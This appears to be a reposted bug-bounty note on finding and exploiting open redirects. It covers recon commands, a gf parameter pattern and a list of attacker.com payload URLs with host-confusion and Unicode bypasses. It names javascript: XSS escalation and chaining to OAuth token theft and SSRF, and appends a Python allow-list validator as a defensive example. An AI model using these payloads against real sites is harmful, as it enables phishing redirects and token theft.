  • URL redirect hunting (open redirect)

    https://0x00sec.org/t/open-redirection-guide/21118

    The tools are all written in Go and I'm not comfortable using them yet, so I'm leaving this as a placeholder to fill in later.

    Identifying possibly vulnerable endpoints:

    • waybackurls + hakrawler + gf

      cat subdomains | waybackurls | tee -a urls
      cat subdomains | hakrawler -depth 3 -plain | tee -a urls
      gf redirect urls

      using redirect.json with gf:

    {
        "flags" : "-HanrE",
        "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
    }
    
    • Google dorks
      site:domain.com inurl:[PARAMETER] using a parameter list
    • Manual inspection by navigating the webapp and intercepting the requests

    Confirm and exploit:

    * https://company.com/?redirect=http://attacker.com
    * https://company.com/?redirect=http://company.com.attacker.com
    * https://company.com/?redirect=https://company.com@attacker.com
    * https://company.com/?redirect=//attacker.com
    * https://company.com/?redirect=http://attacker.com#company.com
    * https://company.com/?redirect=http://attacker.com?company.com
    * https://company.com/?redirect=http://attacker.com/company.com
    * https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ
    
    Using special characters:
    ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
    ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
    ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
    ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
    Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
    ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
    ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
    

    Special characters' source

    Escalating to other vulnerabilities:

    Open Redirect + Misconfigured OAuth App => OAuth Token Stealing
    Open Redirect + Filtered SSRF => SSRF
    Open Redirect + CRLFi => XSS
    Open Redirect + javascript URI => XSS
    

    Source

    Escalate to XSS

    • https://company.com/?redirect=javascript:alert(1)
    • https://company.com/?redirect=javascript:prompt(1)
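    From the defender's side, the payload list above (including the circled-letter host and the javascript: URIs) is a ready-made regression suite for a redirect validator. The following is an added example, not code from the post or from the 0x00sec guide; "company.com" is the hypothetical site used in the post's URLs, and PAYLOADS is a constructed sample of the values the server would see in the redirect parameter after URL-decoding. It contrasts a naive substring check with an allow-list check that also refuses CRLF, which is the CRLFi case mentioned in the escalation list.

```python
import unicodedata
from urllib.parse import urlsplit

# Hypothetical target site from the post's payload list.
ALLOWED_HOSTS = {"company.com", "www.company.com"}

# Constructed sample: the payloads listed above plus two related ones, as the
# server sees the "redirect" parameter after URL-decoding.
PAYLOADS = [
    "http://attacker.com",
    "http://company.com.attacker.com",
    "https://company.com@attacker.com",
    "//attacker.com",
    "http://attacker.com#company.com",
    "http://attacker.com?company.com",
    "http://attacker.com/company.com",
    "http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ",
    "javascript:alert(1)",
    "/\\attacker.com",                  # browsers treat "/\" as "//"
    "/account\r\nSet-Cookie: sid=x",    # CRLFi: header injection via Location
]

def naive_is_safe(target: str) -> bool:
    """Substring check of the kind the payloads above are built to pass."""
    return "company.com" in target

def is_safe_redirect(target: str) -> bool:
    """Allow only a local path or an absolute URL whose host is allow-listed."""
    # CR/LF or any other control character would turn Location into header injection.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False
    # NFKC folds ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ to attacker.com: compare the host a browser resolves.
    target = unicodedata.normalize("NFKC", target).strip()
    # Local path: one leading slash only ("//host" is scheme-relative, "/\" acts as "//").
    if target.startswith("/"):
        return not target.startswith(("//", "/\\"))
    try:
        parts = urlsplit(target)
    except ValueError:          # e.g. malformed IPv6 literal: fail closed
        return False
    # Rejects javascript:, data: and scheme-less "attacker.com".
    if parts.scheme not in ("http", "https"):
        return False
    # "company.com@attacker.com": urlsplit files company.com as username and
    # the browser connects to hostname, so credentials are always refused.
    if parts.username is not None or parts.password is not None:
        return False
    # Exact host match: "company.com.attacker.com" and "#company.com" fail.
    return (parts.hostname or "").lower() in ALLOWED_HOSTS
```

    Every entry in PAYLOADS is rejected by is_safe_redirect, while the subdomain, userinfo, fragment, query and path variants all pass naive_is_safe because they merely contain the string "company.com".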

    Escalate to XSS using CRLFi

  • Original address: https://www.cnblogs.com/ahacker15/p/13065571.html